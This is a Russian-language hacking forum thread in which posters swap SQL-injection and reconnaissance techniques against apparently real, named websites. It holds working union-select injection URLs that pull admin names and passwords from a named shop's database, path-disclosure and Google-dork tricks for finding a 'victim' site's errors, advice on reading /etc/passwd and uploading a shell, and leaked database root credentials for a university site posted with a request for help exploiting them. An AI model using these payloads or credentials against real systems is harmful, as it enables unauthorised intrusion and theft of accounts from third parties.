Ваши вопросы по уязвимостям.

masternet, можешь поискать ошибки на сайте, обычно в них можно найти. А так сканером вполне вероятно узнать...

 

Найти раскрытие путей, правда если включен вывод ошибок

 

Можно узнать, вызвав какую-нибудь ошибку в скрипте(через скуль, инклуд)

 

Зачем уж сразу скуль, инсклуд \ etc) хватит и к примеру md5($_POST['passwd']), &passwd[]=asd

 

да не..чз скуль как узнать полный путь к корню сайта?
load_file('/') не катит(

 

если ты про тот же сайт, про который меня вчера в ЛС долбил, то просто удали из запроса например номер последней колонки - будет ошибка и покажет полный путь

 

Если только File_priv Y ....(то есть можешь прочитать допустим /etc/passwd) ...Найти конфиги апача.....
Ну или из ошибок(если там конечно будет показан полный путь..)

 

если ошибок совсем нет, иногда переменные @@basedir и @@datadir позволяют угадать путь)

 

Часто бывает, что в корне сайта валяется пхпинфо с именем типа phpinfo.php, info.php, test.php и т.д.

 

можно через гугль ошибки поискать...
site:jertva.com Warning
если гугл ошибок не помнит, то идем на

Code:

 madnet.name/tools/madss/

вбиваем имя сайта и смотрим, хостятся ли рядом какие-либо сайты... если да, то поочерёдно вбиваем в гугль
site:sait_ryadom_s_jertvoi.com Warning

P.S
кроме Warning, можно и по другим кеям поискать, Error, "failed to open stream"...

 

Code:

http://asm-mebel.ru/index.php?page=catalog1&id=-1+union+select+column_name+from+information_schema.columns+where+table_name=0x61736d5f61646d696e+limit+2,1--

почему сам учётки не высвечиваются?

 

Ну наверное чтобы узнать учётки надо вот такой запрос сделать

Code:

http://asm-mebel.ru/index.php?page=catalog1&id=-1+union+select+concat_ws(0x40,name,password)+from+asm_admin+limit+0,1--

А то что ты выше написал-этим мы всего лишь узнаем какие колонки в таблице asm_admin

 

Отлично) спс огромное!

подскажите что ещё за хэш ?
5096c350535026dc

 

Далеко не факт, просто вероятно пароль не хранится в бд... А находиться он может где угодно. Я встречал, даже когда авторизация с данными для входа была вшита в сам скрипт(запароленый), к которому мы обращаемся

 

phpMyAdmin редиректит

Есть сайт bridge.tane.edu.ua, есть пароль на рута

Code:

  $DATABASENAME = "stud_test";
  $DATABASESERVER = "localhost";
  $DATABASEUSER = "root";
  $DATABASEPASS = "steppenW";

Есть майадмин: bridge.tane.edu.ua/phpmyadmin/
Сервер запущен на 192.168.101.18, и постоянно туда редиректит, если заходить через майадмин.
Как нормально поюзать багу?

 

Подскажите, каким образом можно просмотреть имена таблиц и колонок при SQL-инъекции другой базы данных, находящейся на этом же аккаунте?

 

Thrasher88
column_name+from+information_schema.columns+where+table_schema='база'+and+table_name='таблица'

 

Он не редиректит просто либо серв мускула на другом серваке,либо на этом же,тогда надо лить шелл.

 

Goudini
Да всё нормально юзается. Заходит в майадмин с этими данными норм, как root@sectorgaza =)
Что конкретно тебе нужно?

 

Всем доброго времени суток!
Я тут недавно начал изучать SQL inj . читал статьи и.т.д

1)Нашел уязвимость подставив кавычку
(выдалась ошибка )

Code:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''100''' at line 6

2)Начал искать кол-во полей подобрал вручную около 50 (потом устал ),
но на 20 аргументе у меня выдалось не то что всегдда выдавалось
(от 1 до 19 и от 21 до 50),я решил что строк 20....

3)Решил подставить VERSION() USER()..итд
получил ответы:
DB: tmhoxc76
Usr: tmhoxc76@*ipsite*
Ver: 4.1.22-max-log

вобщем вопросик:
даж не знаю как сказать....
вобщем все запросы котрые я делал отображались
не в теле сайта,а шли вместо замены ссылки,но выводились правильно как я понял....
так вот как мне тееперь извлечь данные из таблицы?

ПыСы: ссорь hack.lang=2